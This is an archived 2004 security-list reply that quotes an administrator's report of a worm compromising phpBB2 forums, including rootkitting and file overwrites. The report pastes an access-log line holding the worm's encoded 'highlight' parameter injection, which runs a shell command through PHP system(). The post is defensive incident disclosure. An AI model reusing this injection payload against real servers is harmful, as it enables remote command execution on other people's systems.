RE: Worm hitting PHPbb2 Forums

From: Christopher Adickes (christopher_adickes_at_SHI.com)
Date: 12/21/04

  • Next message: skippy1_at_hickorytech.net: "Re: SSH scans..." 
    To: "'L. Walker'" <lwalker@magi.net.au>, incidents@securityfocus.com
Date: Tue, 21 Dec 2004 12:46:30 -0500

    In addition to your post here is some more info.

    http://isc.sans.org/

    -----Original Message-----
    From: L. Walker [mailto:lwalker@magi.net.au]
    Sent: Tuesday, December 21, 2004 4:23 AM
    To: incidents@securityfocus.com
    Cc: full-disclosure@lists.netsys.com
    Subject: Worm hitting PHPbb2 Forums
    Importance: High

    Just spotted two clients hit by this. One client didnt update his
    software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
    Chkrootkit says its Adore, however could be something else. Datacenter
    wasn't very smart and has since wiped the server, so no binaries or other
    evidence.

    Generation 12 only wiped out PHP files, replacing them with its own
    message on other client's PHPbb2 forum. Access logs show:

    66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
    /forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%
    2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%
    252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%2
    52echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252
    echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252ec
    hr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252ec
    hr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252ech
    r(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252ec
    hr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr
    (111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr
    (72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34
    ))%252e%2527
    HTTP/1.0" 200 270
    "http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2
    aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)
    %252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%2
    52echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%2
    52echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252e
    chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252e
    chr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252ec
    hr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252e
    chr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252ech
    r(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr
    (106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(
    78)%252echr(41)%252echr(34))%252e%2527"
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 

    --
L. Walker <lwalker at magi dot net dot au>
Network Administrator / Consultant
--
  • Next message: skippy1_at_hickorytech.net: "Re: SSH scans..."
    • Quantcast